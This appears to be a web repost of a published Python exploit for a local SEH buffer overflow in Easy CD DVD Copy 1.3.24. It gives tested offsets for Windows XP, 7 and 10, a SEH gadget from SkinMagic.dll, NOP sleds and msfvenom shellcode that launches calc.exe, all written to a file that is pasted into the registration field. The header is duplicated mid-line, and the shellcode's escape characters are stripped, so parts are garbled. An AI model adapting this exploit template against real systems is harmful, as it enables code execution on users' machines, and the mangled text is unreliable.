Easy CD DVD Copy 1.3.24 Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 352

#!/usr/bin/python
###############################################################################
# Exploit Title : Easy CD DVD Copy v1.3.24 - Local Buffer Overflow (SEH) #
# Explo #!/usr/bin/python
###############################################################################
# Exploit Title : Easy CD DVD Copy v1.3.24 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.divxtodvd.net/index.htm #
# Vulnerable Software: http://www.divxtodvd.net/easy_cd_dvd_copy.exe #
# Tested on OS : Windows XP professional SP3 - (996 bytes offset) #
# Windows 7 Enterprise SP1 - (1008 bytes offset) #
# Windows 10 Professional 64bit - (988 bytes offset) #
# Steps to reproduce : #
# ~ Copy the content of OpenMe.txt #
# ~ Click on Register #
# ~ Paste content in "Enter User Name" field #
###############################################################################

import struct

#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b "x00" -f python -v shellcode (220 bytes)

shellcode = ""
shellcode += "xbfxc6xdex94x3exdaxd0xd9x74x24xf4x5d"
shellcode += "x31xc9xb1x31x31x7dx13x03x7dx13x83xc5"
shellcode += "xc2x3cx61xc2x22x42x8ax3bxb2x23x02xde"
shellcode += "x83x63x70xaaxb3x53xf2xfex3fx1fx56xeb"
shellcode += "xb4x6dx7fx1cx7dxdbx59x13x7ex70x99x32"
shellcode += "xfcx8bxcex94x3dx44x03xd4x7axb9xeex84"
shellcode += "xd3xb5x5dx39x50x83x5dxb2x2ax05xe6x27"
shellcode += "xfax24xc7xf9x71x7fxc7xf8x56x0bx4exe3"
shellcode += "xbbx36x18x98x0fxccx9bx48x5ex2dx37xb5"
shellcode += "x6fxdcx49xf1x57x3fx3cx0bxa4xc2x47xc8"
shellcode += "xd7x18xcdxcbx7fxeax75x30x7ex3fxe3xb3"
shellcode += "x8cxf4x67x9bx90x0bxabx97xacx80x4ax78"
shellcode += "x25xd2x68x5cx6ex80x11xc5xcax67x2dx15"
shellcode += "xb5xd8x8bx5dx5bx0cxa6x3fx31xd3x34x3a"
shellcode += "x77xd3x46x45x27xbcx77xcexa8xbbx87x05"
shellcode += "x8dx34xc2x04xa7xdcx8bxdcxfax80x2bx0b"
shellcode += "x38xbdxafxbexc0x3axafxcaxc5x07x77x26"
shellcode += "xb7x18x12x48x64x18x37x2bxebx8axdbx82"
shellcode += "x8ex2ax79xdb"

buffer = "A" * 988 # Junk
buffer += "xebx14x90x90" # + nSEH (Jump Code)
buffer += struct.pack('<L', 0x10037b11) # + SEH (pop ebx # pop eax # ret | [SkinMagic.dll])
buffer += "x90" * 50 # + NOP
buffer += shellcode # + shellcode
buffer += "x90" * 50 # + NOP

try:
f=open("OpenMe.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"